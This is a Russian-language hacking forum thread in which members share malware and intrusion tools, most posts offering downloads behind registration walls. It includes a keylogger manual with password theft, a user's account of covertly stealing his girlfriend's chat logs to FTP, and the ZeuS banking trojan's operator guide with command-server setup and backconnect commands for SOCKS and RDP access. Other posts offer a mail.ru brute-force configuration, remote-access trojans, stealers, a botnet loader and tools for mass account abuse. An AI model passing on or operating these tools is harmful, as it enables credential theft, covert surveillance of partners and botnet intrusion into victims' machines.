KBG состоит из исполняемого модуля kbg.exe и библиотеки kbg.dll. При первом запуске создает файл log'а с именем kbgrec.dll в системном каталоге Windows (например: C:\Windows\System\kbgrec.dll). Этот файл имеет текстовый формат и может быть просмотрен в любом текстовом редакторе.(Файл доступен для чтения только при выключенной программе: KBG - Off)
Управление программой: ---------------------- Главное окно KBG имеет 4 кнопки: 1) On - включает программу; 2) Hide - прячет окно программы; 3) Off - выключает программу; 4) ------------------------------- - кнопка, открывающая/закрывающая панель с опциями.
Опции: ------ 1) Recording all keys - включает запись в log всех клавиатурных клавиш, включая функциональные и управляющие; 2) Recording OEM keys - ведется запись только клавиш, имеющих отображение на экране; 3) Creep (*****) passwords - включает функцию обнаружения в окнах и "похищения" ***** - паролей; 4) Block keyboard - блокирует клавиатуру для других приложений; 5) Use Ctrl+ - добавляет необходимость нажатия Ctrl вместе с горячими клавишами F10, F11, F12; 6) Run at system startup - автоматический запуск программы вместе с ОС; 7) Don't show on startup - программа стартует со скрытым окном. 8) Кнопка Registration in system - служит для сохранения установленных пользователем опций в реестре Windows. После ее нажатия кнопка видоизменяется в Unregistration in system и служит для удаления записей KBG из реестра Windows.
Формат файла log'a: ------------------- Файл log'a kbgrec.dll имеет следующий формат:
Пример 1: [KBG 1.0] [Load in Sun Jul 01 11:22:14 2001] -[WND(PRG)] [DISCo Commander 96(C:\PROGRAM FILES\DC\DC32.EXE)] --[WND(CLS)] [none(OwlWindow)] ---[DOWNKEYS] [59483569834] [KBG 1.0] [Exit in Sun Jul 01 12:38:03 2001]
здесь:
[KBG 1.0] - версия программы; [Load in Sun Jul 01 11:22:14 2001] - дата и время старта;
-[WND(PRG)] [DISCo Commander 96(C:\PROGRAM FILES\DC\DC32.EXE)] - -[WND(PRG)] [заголовок окна, в котором была нажата клавиша(имя файла программы)]
--[WND(CLS)] [none(OwlWindow)] - --[WND(CLS)] [заголовок дочернего окна(если оно есть), в котором была нажата клавиша(имя класса окна)]
---[DOWNKEYS] [59483569834] - ---[DOWNKEYS] [нажатые клавиши или вставка из буфера обмена]
Пример 2: [KBG 1.0] [Load in Sun Jul 01 11:22:14 2001] -[WND(PRG)] [Установка связи(C:\WINDOWS\RUNDLL32.EXE)] --[PASSWORD] [(*****) password: mtu] [KBG 1.0] [Exit in Sun Jul 01 11:32:14 2001]
здесь:
[KBG 1.0] - версия программы; [Load in Sun Jul 01 11:22:14 2001] - дата и время старта;
-[WND(PRG)] [Установка связи(C:\WINDOWS\RUNDLL32.EXE)] - -[WND(PRG)] [заголовок окна, в котором была нажата клавиша(имя файла программы)]
Cracker Utilities - это набор инструментов для начинающего крекера.
Сборка включает в себя:
Отладчик: OllyDbg + плагины + на русском языке Дизассемблер: W32dsm Дампер: Task Explorer Перестройщик импорта: Import Reconstructor, Revirgin HEX-редактор: WinHex + на русском языке + с ключом Декомпилятор ресурсов: Resource Hacker Перестройщик ресурсов: Resource Binder Генератор патчей: Diablo2oo2's Universal Patcher + на русском языке
Здесь имеются и вспомогательные инструменты: PEID, Quick unpack, File monitoring, Registry monitoring, OgreGUI, Autoruns,PE Optimizer v1.4
Сборка компактна, содержит только самые необходимые инструменты, а также содержит описания для каждого элемента в самом инсталляторе.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Rim 11.12.2008, 20:38
IEInspector HTTP Analyzer Full Edition v3.3.2.179
Интерфейс: Английский Размер: 3,8Мб ОС: Windows® 98/2000/XP/Vista
» Описание «
HTTP Analyzer – программа-сниффер, позволяющая вам производить мониторинг и захватывать HTTP/HTTPS трафик в реальном времени. Позволяет отслеживать и отображать широкий диапазон информации, включая заголовки, содержание, cookies, строки запросов, отправку данных, потоки запросов и ответов, перенаправление URL и многое другое. Программа дает возможность удобно просматривать потоковые запросы. Кроме этого, данная программа обеспечивает кэширование информации и очистку сессии, информацию о статусе HTTP кода и имеет несколько настроек по фильтрации. Программа доступна в двух версиях, в качестве отдельного полнофункционального приложения и в качестве дополнения для Internet Explorer. Кроме IE, программа поддерживает работу с браузерами Opera, Firefox и другими интернет-браузерами. Основные возможности программы сводятся к удобной отладке HTTP-запросов. Возможности: - Эффективный анализ и диагностика HTTP-трафика для веб-приложений - Отладка веб-приложений - Обнаружение узких мест и медленно работающих частей сетевых приложений - Измерение скорости загрузки, размера содержимого и количества сетевых отправок - Проверка веб-сайтов на безопасность - Анализ интересующих вас веб-сайтов - Помощь в изучении HTTP-протокола - Повышение продуктивности веб-разработки - Встроенный HEX-просмотрщик - Построение HTTP-запросов - Запись промежуточного HTTP/HTTPS трафика - Выборочная очистка кэша и cookie - Поддержка HTTP-сжатия - Фильтрация данных в стиле MS Excel® - Группирование данных
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Rim 26.12.2008, 17:04
Super Mail Spider v2.85
Интерфейс: Английский Размер: 2.04Мб ОС: Windows®
» Описание «
Super Email Spider - программа, которая разыскивает адреса электронной почты по всему интернету. Вы можете записать в строке поиска слово или фразу, по которой начнется поиск адресов. Поиск проходит по 22-ум популярным поисковым сайтам. Программа находит интернет-странички, соответствующие вашему запросу и извлекает из них адреса электронной почты, после чего вы можете извлечь эти адреса в текстовый файл. Программа сканирует все существующие домены и страницы любых видов, в том числе: HTML, PHP, CGI, ASP и др. Она может сканировать также скрытые страницы.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MYSTiQUE 29.01.2009, 12:18
Rootkit-Driver-Loader
1 OSR Driver Loader is a program, which allows Windows Device Driver developers an easy way to register, unregister, start, and stop their Windows Device Driver.
2 Kernel Mode Driver Manager
Intended to make testing of Kernel Mode Drivers. Installing, Starting, Stoping and Uninstalling.
3 Install Drv описание в архиве
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: MYSTiQUE 13.02.2009, 15:33
DSJoiner13
бинарник и исходники
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: ter10n 15.02.2009, 16:09
Dark Brute 0.9.1 - Хорошо настраиваемый двиг POST Запросов
Это демо версия поддерживает 5 потоков.
На 400 потоках + чекнутый прокси из паблика: 20-30ппс После обновления, по идее должно было стать больше, но измерять лень) , гуды вроде не пропускает.
+ Работает с прокси листом + Может работать и без прокси + В полной версии до 1700 потоков - Пока в процессе отладки - Оллидбг вам поможет добится максимум 1 лишнего потока, так что не старайтесь
в сорс.тхт кидайте login;password, для чека - инструкцию смотри
Ниже код для тех кто понимает пост запросы
Код
http://win.mail.ru/cgi-bin/auth? ////адрес скрипта 1 ////необходима ли доп. строка до логина page=&post=&login_from= ////доп. строка до логина Login= ////строка перед самим логином 1 ////необходима ли доп. строка после логина и до пароля Domain=mail.ru ////доп. строка после логина и до пароля Password= ////Строка перед самим логином 0 ////необходима ли доп. строка после пароля ////Раз нет то и не будем ее писать. 0 ////Метод: 0 - парсим ответ, 1 - 302 moved, 2 - 200 ок 53566 ////так как выше выбран 0 то нужно указать символ по которому смотрим гуд или не гуд ////тут пустая строка, ибо, например у маил.ру при плохом пароле нам показывают только форму ввода логина-пароля, а при удачном нам показываю весь интерфейс всего ящика, соответственно символ номер 53566 существует только у хорошего пароля, а у плохого символ под этим номером не существует => он равен "" 1 ////Allowredirect назначение следует из названия
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MYSTiQUE 26.02.2009, 08:26
Сборка фэйков
примерно 70 фэйков. размер - 2,66 мБ
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MYSTiQUE 14.04.2009, 09:26
XND IP-Spoofing Local HTTP-Proxy 1.0
XND IP-Spoofing Local HTTP-Proxy XND ISHP это программа, обеспечивающая вашу анонимность при использовании протокола HTTP/1.x за счет внешних произвольных HTTP-прокси-серверов. Программа выполнена в виде локального прокси-сервера, адрес которого необходимо указать в вашем веб-браузере.
Размер архива - 26,2 кБ.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MMETT 15.04.2009, 14:45
Цитата(Hroft_clone3 @ 3.06.2008, 18:11)
Народ, нужен последний Advanced Office Password Recovery от Elcomsofta, весь форум перерыл, живых линков не нашел :(
Пожалуйста подскажите новые ссылки на лекарство для Advanced Office Password Recovery 4, указанные ссылки пустые :(
Автор: MYSTiQUE 16.04.2009, 09:22
r57mysql_brute
маленький брутфорсер на С для MySQL
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 4.04.2010, 11:03
Ну пред история этой программы такова, что мне надо было узнать переписку моей девушки(после чего мы сильно поссорились) у меня не было интернета и я решил написать программу которая ворует логи QIP и шлет их на FTP. Ну проверяет наличие интернета и сидит ждет его появления + автозагрузка(если вкл. палит каспер и нод как подозрительный)
Выложу исходник на VB6 кому надо доделает подправит что не так использовал 1 раз хотя логи слало долго)
Данные о фтп в коде замените на свои работает на версиях qip 2005
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MadDog 4.04.2010, 11:36
неузнаваемый, доступ удалённый??
Автор: неузнаваемый 4.04.2010, 11:43
ты не понял) он берет логи с папки квипа(правда если он на С: установлен по дискам я поиск не делал) и кидает на твой фтп создает там папку логи и в ней номера асек и туда логи если нету инета то висит в процессах пока не появится + висит в автозагрузке. если без иконки мало весит + можно упаковать
Автор: MadDog 4.04.2010, 11:46
неузнаваемый, тоесть залить нада на комп жертвы что б пахал??) а с фтп то я сам прочту)
Автор: неузнаваемый 4.04.2010, 11:50
да как троя кидай он в папку винды копернется и оттуда в автозагрузку(токо она палится может есть код другой чтобы не палилось если ее отключить то ок все)
Автор: неузнаваемый 6.04.2010, 17:11
Zeus 1.2.4.2_7.11 Webpanel_1.2.5.1
может с чем-то склеено не проверял на свой страх и риск!
В архиве: Zeus 1.2.4.2 Zeus 1.2.7.7 Zeus 1.2.7.11 Webpanel 1.2.5.1
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
» Инструкция «
Руководство пользователя (ЧЕРНОВИК) ***********************************
============== = Содержание = ==============
1. Описание и возможности. 2. Настройка сервера. 2.1. HTTP-сервер. 2.2. Интерпретатор PHP. 2.3. MySQL-сервер. 2.4. Панель управления. 2.4.1. Установка. 2.4.2. Обновление. 2.4.3. Файл /system/fsarc.php. 3. Настройка бота. 4. Работа с BackConnect. 5. История версий. 6. F.A.Q. 7. Мифы.
============================== = 1. Описание и возможности. = ============================== ZeuS - программное обеспечение для кражи личных данных пользователей с удаленных систем Windows. На простом языке "Троян", "Бэкдор", "Вирус". Но автор не любит эти слова, поэтому далее в документации он будет называть это программное обеспечение "Бот".
Бот полностью основан на перехвате WinAPI в UserMode (Ring3), это значит, что бот не использует каких-либо драйверов и обращений в Ring0. Эта особенность дает возможность запускаться боту даже из Гостевых учетных записей Windows. Плюс это гарантирует повышенную стабильность, и адаптивность к последующим версиям Windows.
Бот разрабатывается на Visual C++ версии 9.0+, при этом не используются дополнительные библиотеки типа msvcrt, ATL, MFC, QT и т.д. Код бота пишется со следующими приоритетами (в порядке уменьшения): 1. стабильность (старательно проверяются все результаты вызова функций и т.д.), 2. размер (избегаются повторы алгоритмов, повторы вызовов функций и т.д.), 3. скорость (нет инструкций типа while(1){..}, for(int i = 0; i < strlen(str); i++){..}).
Функции и особенности бота: 1. Снифер трафика для протокола TCP. 1.1. Перехват FTP логинов на любом порту. 1.2. Перехват POP3 логинов на любом порту. 1.3. Перехват любых данных из трафика (персональный заказ).
2. Перехват HTTP/HTTPS запросов для wininet.dll, т.е. всех программ работающих с этой библиотекой. Сюда входят Internet Explorer (любая версия), Maxton, и т.д. 2.1. Подмена ..
3. Функции сервера. 3.1 Socks4/4a/5. 3.2 Бэкконект для любого сервиса(RDP, Socks, FTP, и.т.д.) на зараженной машине. Вы можете получить доступ к компьютеру, который находится за NAT, или, например, к которому запрещены подключения из интернета. 3.3 Получение скриншота экрана в реальном времени. -- не дописано ---
========================= = 2. Настройка сервера. = ========================= Сервер является центральной точкой управления ботнетом, он занимается сборкой отчетов ботов, и отдачей команд ботам. Крайне не рекомендуется использовать "Виртуальный Хостинг" или "VDS", т.к. при увеличение ботнета, нагрузка на сервер будет увеличиваться, и такой вид хостинга довольно быстро исчерпает свои ресурсы. Вам нужен "Выделенный сервер" (Дедик), рекомендуемая минимальная конфигурация:
Для работы бота необходим HTTP-сервер с подключенным PHP + Zend Optimizer, и MySQL-сервер.
ВНИМАНИЕ: Для Windows-систем очень важно изменить(создать) следующее значение реестра: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\MaxUserPort=dword:65534 (десятичное)
--------------------- - 2.1. HTTP-сервер. - --------------------- В качестве HTTP-сервера рекомендуется использовать: для nix-систем - Apache от версии 2.2, для Windows-систем - IIS от версии 6.0. Рекомендуется держать HTTP-сервер на 80 или 443 порту (это положительно влияет на отстук бота, поскольку провайдеры/прокси могут блокировать доступ на иные, нестандартные порты).
--------------------------- - 2.2. Интерпретатор PHP. - --------------------------- Последняя версия панели управления разрабатывалась на PHP 5.2.6. Поэтому крайне рекомендуется использовать версию, не ниже этой версии. Но в крайнем случаи не ниже 5.2.
Важно произвести следующие настройки в php.ini:
safe_mode = Off magic_quotes_gpc = Off magic_quotes_runtime = Off memory_limit = 256M ;Или выше. post_max_size = 100M ;Или выше.
а также рекомендуется изменить следующие настройки:
display_errors = Off
Также понадобиться подключить Zend Optimizer (ускорение работы скриптов, и запуск защищенных скриптов). Рекомендуется версия от 3.3.
Не рекомендуется подключать PHP к HTTP-серверу через CGI.
---------------------- - 2.3. MySQL-сервер. - ---------------------- MySQL требуется для хранения всех данных об ботнете. Рекомендуемая версия не ниже 5.1.30, так же стоит учесть, что при работе панели управления в более старых версиях были обнаружены некоторые проблемы. Все таблицы панели управления идут в формате MyISAM, важно правильно оптимизировать быстродействие работы с этим форматом, исходя из доступных ресурсов сервера.
Рекомендуется внести следующие изменения в настройки MySQL-сервера (my или my.ini):
max_connections=2000 #Или выше
Загрузить MySQL: http://dev.mysql.com/downloads/
--------------------------- - 2.4. Панель управления. - ---------------------------
2.4.1. Установка. ***************** Назначение файлов и папок: /install - инсталлятор. /system - системные файлы. /system/fsarc.php - скрипт для вызова внешнего архиватора (раздел 2.4.3). /system/config.php - файл конфигурации. /theme - файлы темы (дизайн), без зенда, могут свободно изменяться. cp.php - вход в панель управления. gate.php - гэйт для ботов. index.php - пустой файл для предотвращения листинга файлов.
Панель управления обычно расположена в вашем дистрибутиве в папке server[php]. Все содержимое этой папки необходимо загрузить на сервер в любую папку доступную по HTTP. Если вы загружаете ее через FTP, то все файлы нужно загрузить в БИНАРНОМ режиме.
Для Windows-систем: \system - права на полные права на запись, чтение для пользователя из под которого происходит доступ через HTTP. Для IIS это обычно IUSR_*. \tmp - также как и для \system.
После того как все файлы загружены, необходимо через браузер запустить инсталлятор по URL http://сервер/папка/install/index.php. Следуйте появившимся инструкциям, в случаи возникновения ошибок (вы будете подробно уведомлены) в процесс установки, проверти правильность введенных данных, и правильность установки прав на папки.
После установки, рекомендуется удалить директорию install, и переименовать файлы cp.php (вход в панель управления) и gate.php (гэйт для ботов) в любые файлы по вашему желанию (расширение менять нельзя).
Теперь вы можете благополучно входить в панель управления, введя в браузере URL переименованного файла cp.php.
2.4.2. Обновление. ****************** Если вы обладаете более новой копией панели управления, и желаете обновить старую версию, то необходимо сделать следующие:
1) Скопировать файлы новой панели управления на место старых. 2) Переименовать файлы cp.php и gate.php согласно их реальным именам выбранным вами при установке старой панели управления. 3) На всякой случай, повторно выставить права на директории согласно пункту 2.4. 4) Через браузер запустить инсталлятор по URL http://сервер/директория/install/index.php, и следовать появившимся инструкциям. Процесс работы инсталлятора может занять достаточно большой промежуток времени, это связано с тем, что некоторые таблицы с отчетами могут пересоздаваться. 5) Можно пользоваться новой панелью управления.
2.4.3. Файл /system/fsarc.php. ****************************** Данный файл содержит в себе функцию для вызова внешнего архиватора. В данный момент архиватор используется только в модуле "Отчеты::Поиск в файлах" (reports_files), и вызывается для загрузки файлов и папок в виде одного архива. По умолчанию функция настроена на архиватор Zip, и является универсальной для Windows и nix, поэтому все что вам нужно сделать, это установить в систему этот архиватор, и дать права на его исполнение. Вы также можете отредактировать этот файл для работы с любым архиватором.
=========================== = 4. Работа с BackConnect = =========================== Работа с BackConnect рассматривается в виде примера.
IP BackConnect-сервера : 192.168.100.1 Порт для бота: 4500 Порт для клиентского приложения: 1080
1) Запускается серверное приложение(zsbcs.exe или zsbcs64.exe) на сервере имеющем свой IP в интернете, для приложения указывается порт, на котором ожидается подключение от бота, и порт к которому будет подключаться клиентское приложение. Например zsbcs.exe listen -cp:1080 -bp:4500, где 1080 - клиентский порт, 4500 - порт для бота.
2) Необходимому боту отправляется команда bc_add service server_host server_port, где service - номер порта или имя* сервиса, к которому необходимо подключится на боте.
*в настоящее время поддерживается только имя socks, которое позволяет подключится к встроенному в бота Socks-серверу.
server_host - сервер, на котором запушено серверное приложение. Здесь может быть указан IPv4, IPv6, или домен. server_port - порт, который указан в опции cp серверного приложение. В данном случаи 4500.
Пример: bc_add socks 192.168.100.1 4500 - в результате вы получаете socks, bc_add 3389 192.168.100.1 4500 - в результате вы получаете rdp.
3) Теперь необходимо ждать подключение бота к серверу, в этот период любая попытка клиентского приложения подключится будет игнорироваться (будет происходить отключение клиента). Знаком подключения бота, будет вывод в консоль сервера строки "Accepted new conection from bot...".
4) После подключения бота, вы можете работать со своим клиентским приложением. Т.е. вы просто подключаетесь к серверу на клиентский порт (в данном случаи 1080). Например, если вы отдали команду socks, то на клиентском порту вас будет ожидать Socks-сервер, если указали порт 3389, то вы подключаетесь к 192.168.100:1080 как к обычному RDP.
5) После того, когда вам не нужен BackConnect от бота для определенного сервиса, необходимо отдать команду bc_del service server_host server_port, где все параметры должны быть идентичны параметрам bc_add, которые необходимо удалить. Также здесь можно использовать спец. символы '*' и '?'.
Например: bc_del * * * - удалит все BackConnect'ы, указанные на боте. bc_del * 192.168.* * удалит все BackConnect’ы, подключаемые к серверам с IP 192.168.*. bc_del 3389 192.168.100.1 4500 - удалит конкретно один BackConnect.
ПРИМЕЧАНИЯ: 1) Вы можете указывать сколько угодно BackConnect'ов (т.е. bc_add), но у них не должна быть общая комбинация IP + Port. Но в случаи наличия такой комбинации, будет запускаться первая добавленная. 2) Для каждого BackConnect'а, вы должны запускать отдельное серверное приложение. 3) В случаи разрыва соединения(падения сервера, падение бота и т.д.), бот будет повторят подключение к серверу бесконечно(даже после перезагрузки PC), до тех пор пока BackConnect не будет удален (т.е. bc_del). 4) В качестве service для bc_add, может быть использован любой порт открытый по адресу 127.0.0.1. 5) Серверное приложение поддерживает IPv6, но в принципе в настоящее время эта поддержка не особо актуальна. 6) Возможен запуск серверного приложения под wine. Написание же elf приложения в настоящее время не планируется. 7) Крайне рекомендуется использовать в опции bp серверного приложения популярные порты (80, 8080, 443 и т.д.), т.к. иные порты могут быть заблокированы провайдером которому принадлежит бот. 8) Нельзя позволят подключатся разным ботам на один и тот же серверный порт одновременно. 9) Метод такого подключения может пригодиться и для ботов, которые находятся вне NAT, т.к. иногда фаерволами Windows или провайдерами, могут быть заблокированы подключения из интернета.
ПРИМЕЧАНИЕ: Данная функция доступна не во всех сборках бота.
[Версия 1.2.0.0, 20.12.2008] Общее: [*] Более не будет документации в chm-файле, все будет писаться в этот файл. [+] Теперь бот способен получать команды не только при отправки статуса, но и при отправки файлов/логов. [+] Локальные данные, запросы к серверу, и файл конфигурации шифруются RC4 с ключом на ваш выбор. [*] Полностью обновлен протокол бот <-> сервер. Возможно, понизится нагрузка на сервер.
Бот: [-] Устранена ошибка, блокирующая бота на лимитированных ученых записях Windows. [*] Написан новый PE-криптор, теперь PE-файл получается очень аккуратным и максимально имитирует результат работы MS Linker 9.0. [*] Обновлен процесс сборки бота в билдере. [*] Оптимизировано сжатие файла конфигурации. [*] Новый формат бинарного файла конфигурации. [*] Переписан процесс сборки бинарного файла конфигурации. [*] Socks и LC теперь работают на одном порту.
Панель управления: [*] Статус панели управления переведен в BETA. [*] Изменены все таблицы MySQL. [*] Начет постепенный перевод Панели Управления на UTF-8 (возможны временные проблемы с отображением символов). [*] Обновлена геобаза.
[Версия 1.2.1.0, 30.12.2008] Бот: [*] BOFA Answers теперь отсылается как BLT_GRABBED_HTTP (было BLT_HTTPS_REQUEST). [-] Мелкая ошибка при отправке отчетов. [-] Размер отчета не мог превышать ~550 символов. [-] Ошибка существующая с начала существования бота: низкий таймаут для отсылки POST-запросов, в результате чего блокировалась отсылка длинных (более ~1 Мб) отчетов на медленных соединениях (не стабильных), как теоретическое последствие - бот вообще переставал слать отчеты.
Общее: [+] В случаи записи отчета типа BLT_HTTP_REQUEST и BLT_HTTPS_REQUEST в поле SBCID_PATH_SOURCE (в таблице будет path_source) добавляется путь URL.
Панель управления: [*] Обновлен redir.php.
[Версия 1.2.2.0, 11.03.2009] Бот: [-] Устранена ошибка в HTTP-инжектах существующая на протяжении ВСЕХ версий бота. При использовании в программе асинхронного режима wininet.dll, был упущен момент синхронизации потоков создаваемых wininet.dll, в результате чего, при некоторых условиях происходило исключение. [+] При срабатывании HTTP-инжекта, теперь также изменяются файлы в локальном кэше. Отсутствие этой доработки, позволяло не всегда срабатывать HTTP-инжектам. [+] Уменьшен размер PE-файла.
[Версия 1.2.3.0, 28.03.2009] Бот: [-] Мелкие ошибки в крипторе, спасибо доблестным говноаналитикам из Avira.
Общее: [*] Изменен протокол раздачи команд ботам.
Панель управления: [*] Полностью переписана панель управления. [*] Дизайн переписан на XHTML 1.0 Strict (под IE не работает). [*] Бот теперь опять способен получать команды только при отправке отчета об онлайн-статусе (слишком высокая нагрузка). [*] Обновлена геобаза.
[Версия 1.2.4.0, 02.04.2009] Бот: [+] При работе с HTTP, заголовок User-Agent теперь читается от Internet Explorer, а не является константой как раньше. Теоретически из-за постоянного User-Agent'а, запросы могли блокироваться провайдерами, или попадать под подозрение.
============= = 6. F.A.Q. = ============= Q: Что значат цифры в версии? A: a.b.c.d a - полное изменение в устройстве бота. b - крупные изменения, которые вызывают полную или частичную несовместимость с предыдущими версиями. c - исправления ошибок, доработки, добавление возможностей. d - номер чистки от антивирусов для текущей версии a.b.c.
Q: Каким образом генерируется Bot ID? A: Bot ID состоит из двух частей: %name%_%number%, где name - имя компьютера (результат от GetComputerName), а number - некое число, генерируемое на основе некоторых уникальных данных ОС.
Q: Почему трафик шифруется симметричным методом шифрования (RC4), а не асимметричным (RSA)? A: Потому что, в использовании сложных алгоритмов нет смысла, шифрование нужно только для скрытия трафика. Плюс в RSA только, в том что не зная ключа находящегося в Панели управления, не будет возможности эмулировать ее ответы. А какой смысл защищаться от этого (с глобальной точки зрения)?
Q: Я повредил таблицы/файлы панели управления, что делать? A: Воспроизвести инструкции, указанные в пункте 2.5.
=========== = 7. Мифы = =========== M: ZeuS использует DLL для своей работы. A: Ложь. Существует только один исполняемый PE файл (exe). Dll, sys и т.д. не когда не было и врятли когда-либо будет. Этот миф пошел в результате того, что в некоторых версия бота для хранения настроек, используются файлы с такими расширениями.
M: ZeuS использует COM (БХО) для перехвата Internet Explorer. A: Ложь. Всегда для этого использовался перехват WinAPI из wininet.dll.
Автор: nickman86 7.04.2010, 17:02
Цитата(неузнаваемый @ 6.04.2010, 17:11)
Zeus 1.2.4.2_7.11 Webpanel_1.2.5.1
может с чем-то склеено не проверял на свой страх и риск!
В архиве: Zeus 1.2.4.2 Zeus 1.2.7.7 Zeus 1.2.7.11 Webpanel 1.2.5.1
Лучше не скачивайте,фейк + много приаттаченных криптованых файлов которых там не должно быть. У меня есть более ранняя версия zues'a ,а версии начиная с 1.3.х.х лучше не брать - они ограниченные в использовании. Если надо также дам mpack. Запросы в приват только. Ник
Автор: неузнаваемый 7.04.2010, 17:14
Я написал что может быть склеен! Думаю все знают что не провереный софт лучше юзать на виртуалке
Автор: black_knight 7.04.2010, 17:16
nickman86, выложи свой с хайдом, если боишься большого распространения
Автор: неузнаваемый 7.04.2010, 17:38
CyberGate отличный RAT
Тащит пароли мозилы оперы ие включая с обновлением!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 8.04.2010, 08:09
Видео по настройке пинча. Видео со всем необходимым софтом. На видео: [+] Наглядно показан весь процесс, с коментариями в блокноте (при записи). [+] Рега мыла. [+] Рега хостинга. [+] Настройка пинча/гейта. [+] Заливка всего этого на хост. (настройка) [+] Как сделать чтобы гейт не заблокировали. [+] Join and Crypt. [+] Востановление битых отчетов. [+] Весь необходимый софт в архиве. (включая pub крипторы и джойнер)
Взято со Злого. Данный софт уже сильно устарел и не ворует информацию с новых программ! но для ознакомления можно может кому пригодится
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 9.04.2010, 08:08
Bi0.soft VK (edition)
» Инструкция «
[Change Password]
Утилита для массовой смены паролей.
ВНИМАНИЕ! Перед использованием, прочекайте свои акки. Все аккаунты должны быть валидными!
Использование: 1. Поместите список аккаунтов в формате email:pass в файл base.txt 2. Запустите программу Change Password.exe 3. Введите необходимые данные: New password - новый пароль для всех аккаунтов 4. После завершения работы программы, в good.txt будут новые акки
ВНИМАНИЕ! Перед использованием, прочекайте свои акки. Все аккаунты должны быть валидными!
Использование: 1. Поместите список аккаунтов в формате email:pass в файл base.txt 2. Запустите программу addapp.exe 3. Введите необходимые данные: Application ID - номер приложения, например 759288 Friend ID - ваш ID аккаунта с друзьями, который рассылает приглашения, например 1 (Павел Дуров) Timeout - задержка между запросами приглашения, в секундах, например, 10 или 0 для рассылки без задержки 4. После завершения работы программы, снимайте голоса с приложения
Список доступных приложений доступен в самом приложении. ======================================================== [ALLtoONE]
Утилита для добавления друзей на один аккаунт.
ВНИМАНИЕ! Перед использованием, прочекайте свои акки. Все аккаунты должны быть валидными!
Использование: 1. Поместите список аккаунтов в формате email:pass в файл base.txt 2. Запустите программу ALLtoONE.exe 3. Введите необходимые данные: Friend ID - ваш ID аккаунта, к которому добавляются друзья 4. После завершен
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 9.04.2010, 08:47
Fly Stealer 0.1 Зарубежный аналог пинча! на данный момент лучше так как включены новые броузеры! Относительно новый!
Release date: 21/12/2009 Developed by: BUNNN Made in: Romania, Europe Gfx by: Triggerone Credits: Cobein, Bilal Ghouri, SqUeEzEr, 7/Mr52, Rtflol Beta testers: Blackdark Krizhiel Maron Pujan Ady Developed for: HackHound.org
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
По поводу настройки итд. в раздел вирусы! Не забываем спасибо!
Автор: неузнаваемый 9.04.2010, 09:47
Elite Loader Админка: [+] Удобный и юзабильный ajax интерфейс. Админки на этом фреймворке уже давно стали нашей визитной карточкой. [+] Создание неограниченного числа заданий. [+] Установка правил стран разрешённых/запрещённых для загрузок в виде удобных списков, либо загрузка всех стран. [+] Выбор файла для загрузки как локального, так и по url. [+] Установка рефера для загрузки с удалённого хоста. [+] Установка лимитов загрузок для задания. [+] Удобный список заданий, редактирование, удаление, изменения статуса активное/не активное. Поиск по названию или по имени файла/url. [+] Список ботов отображает данные: id, версию, страну, ip, время первого захода, время последнего захода. Поиск по id, ip или стране. [+] Дополнительная кнопка в списке ботов, отображает список выполненных заданий каждым ботом, по их именам. [+] Статистика. График отображает активность ботов по дням и часам, какое количество приходится онлайн. Вторая вкладка показывает общую статистику ботнета. [+] Верхняя панель кнопок позволяет очищать историю заданий по ботам, что бы не перегружать базу, а так же полный сброс удаление всех ботов и заданий. [+] Обновление билда лаодера, имеет 2 свойства. 1) Версия самого билда задаётся вручную для отслеживания в списке ботов разных версий. 2) Дата обновления билда, служит для обновления криптовки и поддерживает всех ботов последней версией. Так же версию билда можно всегда посмотреть, что бы не перепутать.
Бот: [+] Написан на чистом WinAPI C++/Asm. [+] Размер билда: 11кб [+] Шифрование данных между админкой и ботом динамическим ключём. [+] Разные имена файлов в системе. [+] Резидентен в системе. [+] Работа в windows: xp sp1/2/3, vista [+] Кодирование и разбивка по частям url в билде. [+] Обход firewall: стандартный windows, outpost, McAffee через их уязвимости. (Обходы принадлежат http://fbi.cih.ms) [+] Одновременное выполнение большого количества заданий. [+] Запуск как самого бота, так и загружаемый софт сразу после загрузки.
Возможно склеен!! Юзаем на виртуалке)))
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 300 сообщений.
Автор: неузнаваемый 9.04.2010, 11:26
Тему немного почистил!
Автор: неузнаваемый 12.04.2010, 12:04
- Server Builder 100% (не тестировался на X64 OS) - Стойкость 90% (я буду добавлять дополнительных потоков для более peristance) - кажется, "Стабильный" Х) - Process Manager 10% (только GUI!)
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как наберете 500 сообщений.
Автор: неузнаваемый 12.04.2010, 18:54
Чекер / Брутфорс QIP.RU [php]
Я думаю не стоит объяснять что это, но для особо одарённых объясню:
* Чекер - это проверка на работоспособность аккаунта, он бывает валид ( рабочий), и невалид ( не рабочий). * Брутфорс - это такая штука которые пароли перебирает, генерируете программой список login:pass, и чекаете их.
Как это работает?
Нам нужен хостинг с поддержкой PHP + cURL, закидываете все файлы на хост, ставите права 777 на папку ( куда закинули все файлы).
